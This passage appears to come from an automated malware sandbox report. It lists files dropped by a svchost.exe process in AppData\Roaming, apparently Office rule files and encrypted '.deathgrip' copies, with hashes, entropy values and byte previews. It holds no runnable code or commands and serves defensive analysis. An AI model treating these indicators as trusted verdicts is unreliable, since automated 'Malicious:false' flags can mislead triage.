                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700951v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701050v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701050v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.811120835439481
                                                          Encrypted:false
                                                          SSDEEP:48:DJdWPAkuHVjBUeDThF8hDe1xz6P5KOOCpNf:DvIAVbUywhy3z2Vpt
                                                          MD5:FC87447E2462DA8CD3262C3B3C6F5ED6
                                                          SHA1:0FA5D5B1D22EE9074BBADC22E44BB415981FAB1E
                                                          SHA-256:F41DC9A337063C3B9AF1F33D59F2A65CB13B7A2FA02F3F73578FC8D2A716F186
                                                          SHA-512:78C13D279CD53B888015200E442F3F4521BC0493060200D5581E2C5B434870711042940786DBED717D6084E7F4DBC84787F7A1EA42C6821C3138EABEBBAB247C
                                                          Malicious:false
                                                          Preview:...........k.kW.R.&.af.V...!.4j.....M/\cK.>RJ...[.W..;...UPa....'.~....6._.._......U....^.N..{...d..Ov.$.j."K<..BO.O#`\.o8....>{.>..".}...*....4N...;KC..Ew.....h..v.......R..v..m.....f....l`..?.....?]...c....N.hpE.H"<.gu..wa.UG.t......).X.K= .I}....>....Ydv.i....y...../ ..|.D.(.<x......6-$....T....O.O..Y[...V......t.....ty.'...}..-.T.A.G.......%.....,.......K.&p..H..H.f..1...)z'.UK7......Y$s.di..7}..m.`.*U.5.J.;.2.....OHp.<.K...?.$.5....%...M...e..ttY..."......-bN$S..c...BB.39......&uI.+.?9M.q....P.,.WP ...{.........f.#H..Q..\-.M....P.J.....!e?R..'.Ub....\.L..'j....r.b...x.H`.)#&'.Q@.}.c......&.$.A.....WWf.L..b=.{...Q...MT.J.}bJ.,..UX....)j?..7a.o.[........I.r6..@.A.pN.}..J...%.{x.(O.w.."........qh.G...k.4.7...T.U.a._.:....8.^...p.1a4A...n.3^N%}$... ...A..._.g.....1...'N#....0pF...a#Sx..LN..B...~..>}./...s.&.......S=`av.m.....94.......O....(.6x.%.....HW....}........c.TW.{.7g.i...+c...p.../..M..H[~...o4.O.........w.Q..4.c8.. .

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701051v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701051v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.076679942946006
                                                          Encrypted:false
                                                          SSDEEP:6:qQwYtb4wupNU889u6iMGA0AEkxAulfvqEX8GcoDrtq8tXjTE9eOsWMNpjW:qQ5F4PjX8s6/X0svxX8GcAtZsU6J
                                                          MD5:DCB83B9DF017326FF821A3C9FBDD121C
                                                          SHA1:CA4FBEB6024A29E67ADAD97AF3237E6B66D6B8B4
                                                          SHA-256:76A933ED5E4CDC3EA91850F8D8FFEE77E97D44A78A68EB0D5336841D9ACC5601
                                                          SHA-512:FF290C508E6B7921E12535C8A17EB82E142B62777B53ADE0929E89435530D16CA87DA10B6A58C45D97B7A32EAD7AEAC3074B7650AC1911DD5AB44E6A33CFE79E
                                                          Malicious:false
                                                          Preview:.........L2.?44.)v.'2.2Dm1PfQi7OshLKOd8T5NUdPkbhyARKQfIBIEppwlDJ2AyVhKEO7NDwYeEG8A1ezZxEDogXP3S2S1ybygCCLyO9pll62OHdGdPeKDu6JYWqjZceg5xVrYZRJ8q/mCY4aFmFJpnjkKab+DiQKOBUQWXKFVYPb7DCwmYw4YDZ8HCIFBmIine/0OwuK6jP7J2g+n85L20r0thBcObtJar8E3MCo5Q5+1lyj+jtQi6Rd46Xt6nxVffrsMaZqZw14T+l8lNqntfJEnYXEk+0B1wmvDmXppwxoZE6t9YGyKELJp7FvuBzuXQa89++4vsuI7FtB+9Rn6daxTOlSXjqeaeLS6QEg==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70029v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700350v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700351v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70036v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70036v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70037v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70037v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700400v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700400v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700401v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700401v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700450v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700450v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700451v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700451v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.822744165379769
                                                          Encrypted:false
                                                          SSDEEP:48:9hSkS0ZEOL8rkMvFZg0o0pUl5WnDhP98o2fR94Fqt:rSk1uW8AUZg0oiUzEKo0GFqt
                                                          MD5:0C6A493EF4F810A60C2C437B35705674
                                                          SHA1:E731EAF9E0128CFFDC196C412573FEB25EDA9C5C
                                                          SHA-256:926982E2192CE74809E44DF6C15917F9C81481E161220ED34F2FD327A53E7A9F
                                                          SHA-512:A30BAAF33394855A32B5F6170932C30C177E37B4EA2B78BB5ECD6E373C20E6AADB1ECB802045A87F1BBD78086E033B959BA18D6FF1CA6765A14F7719FF59D641
                                                          Malicious:false
                                                          Preview:...........h..td..ebE4...9..w..i....2...(N..6+.;.(.8......+^...F.:|....C..:,%p.c....3h\..#.8(6..5 ..\..*N..U.I.;3N.w.X......K.T.oj.F....3.*t.E..!F.+"zg.=:...o..X..2b{..L....$)^.t..>Q8....iL.....P..b...v....._.N..*9.pU.r...51......i....j.4.....a..........Q'.PsS".1.J...l;X.&.e..8..&*k.Y..i....^.w.;..qJ.T...l...&...TA.yYB...=.J.w.[.ti...v..8.8.J.._..an.n.j.y......x...+..P...nf..61...O./N.d&.d K.&Hx..k...gaK....i[f.H.3*d...E...9...`.oY.~Z....(.......&.w9.+.0..X.R.E..[.O.x....`...c..MBt..[K.....LQ......D\..GD.-o4.,U...d.... .....|...iO...../....G".........<..-2..B.(9*....c...8.........z....W....[06....X=..1...~...z..6.O...#..h......D..;e.E'V.)..........T.lT1.hBX..q.U...='}].c.........<YP....4;.../V..*....a.2?H...y3...|..z....2.f....H.....q.w.l....\.......IW.....$.@.p.r.<.mT..v....8.*..d..\..w...>h..a..N.4".Hf.&....-......'..J....K...)t..o...b......N...l2..,...#..5........A,.r...$G.*..$.4.{;^..I).#bGL.S.\...m...."...L>.q....>.E.....{....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700500v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700500v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700501v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700501v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.806057614863617
                                                          Encrypted:false
                                                          SSDEEP:48:FrNnp4Cd7yJxymdsYoVjbviD5nSjFrPkbeIV7/gAz:3p4o7yJxD7rMxPPI1F
                                                          MD5:4CDE2894803021DE938C1E9E6733E25A
                                                          SHA1:D5A02A7A5CE8C07228CD98C6102158820C9BF46A
                                                          SHA-256:12649BE37202E60802F8C8BF81212F6B30A24556CA258E888E4CBB754F0E628C
                                                          SHA-512:D9A446C3EA0F8B7EE6258AD8391876FBA0F58B3BBF6A16D9366F82D2DAAE836F570727344BD2ABBB7C04DA32F64C6DE716DE4EE3EB732AA1BD21BFFA1286594B
                                                          Malicious:false
                                                          Preview:........M.....`S...F..f..Zx..w..RfW.{..R....:........]..h..y...O.S.^.....>..u...R.NL.U-$...m..w...Sl.N..'..o.^-..t.......O........<.`...n-^.n.Z.....'..0.k.qA..k.....xue..y4;.$..9.7....d.......4..D..o7..^.......S.=..........k...xIYc...R'.7|.._..=..(..4.......w&....n......".#!u..<..f.b.i...........S@1.;.V..>p.J.x ..F$....Z....=5...L..8O..7s.d.Y...$......z..&.... ......9..%n..^p4V....].f/.-.fl..{....S.&....gD(H_.@.0.S<.aq.s....Hmo...I..DTakw.p.....)9.....*g.2...M.1...\..7.y...3m..w.N.YOl.....gGd4.%y.{..5.,%..\3.{RF..pr{.._@.....'.O.?....p..>....F.......S...Xp.q*...MN..|af..".0..Pw..........?.@By.v..........;c.y....B.....M)%cL....s....W...:.....4~...Xz'...........#M$v`..3....$.R..g..v$..z...L(n.}.i.2..-07..TK...-..*g1L.V..6..n.[.f....M,........c.7..T.^$.b`.B#k.C....#..M..W.n8..d. 7Dw..nUz..$..4F0.{].I..K....D..a..8..(..o"_x.....a'...5..1...........;...P.X...v_..V-.~..U....e..9>.;TM.....x.......c}*~{...;.......w;..V....;.Ob..0.yo..5q...`..rm...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700550v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700550v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1712
                                                          Entropy (8bit):7.814599162371823
                                                          Encrypted:false
                                                          SSDEEP:48:FCBZ7Hxz76R0a3g5rNXoKMmiUEbpXqDCkD6bdQRK2+MTeq5fc+1:KH16RI9odZtRkD6biRK2jEw
                                                          MD5:3B1D432AC9479A527E1B22B169427577
                                                          SHA1:51BD34C5FC35BD772EF78743B25A2F70CC48F8F6
                                                          SHA-256:673A3F2DCB45241376734F8196B9F32991E5271C2C67A627F7F21A7822EDED92
                                                          SHA-512:D8C1C461F351F85459F9FB55D6E58E6C7AB33C7A53E50889AABB3850C8F5B4D4FEBFAB44D1BF2CABB4D51CCE15EA562127025CE6EF0D3284129B3255E2964098
                                                          Malicious:false
                                                          Preview:........M.....`S...F..f..Zx..w..RfW.{..R....:........]....:l.5.q..2...wI./..Us..n..]G..O|...$.{..4.[e..o.I....s.L`.._.>F...D...1R.$E....,.o...^F..r............w...Z..M.*.f;N......|.M.e."..5.. .J..#.....d...0...c.*p..Z...{.=..$..H.m.w8)^..9{]$z...oL*.......'y...._..Yf?.....7.k%...~E....{R..v....I 3" #.$......2....).....aK.{......;..:......xV$.=.8. .T..'..:..u ...U...v..N.d.7$q...b......R.\..V...g.wk.P...K.......r.V8.jHq..?..9...#. .xN........%...5....}.!.x..N<..:v...l*-.....u.3..`.'w..B.:.\J.{...T...*`vJ.X.1.7.T.]}J.=.lX..77..Bn. ...&...Xp[..............j...V..pw...7.lm.n.;|.C...W&......xd.)f....[+FJL..cc..K.B.r\V...@...."......,..hH...y2....Y8.Un..3.H9..k..by...R.k....[.1$....W.H..8G.\z.R.J......-...,.......#.W5...t...2...g.k.i...........f...L...?.{.F..xJ.. ..rH..Q....t..P_.....d...:w...cD......?..+...q.(.(=.K<O.........I].X0.U.r .,..i!..l...&.....m]1.U;."....e...u...?......A&t...i...>....D.[!....#]..&&.].,..........V.e.}...v.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700551v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700551v1.xml.deathgrip

                                                          Download File
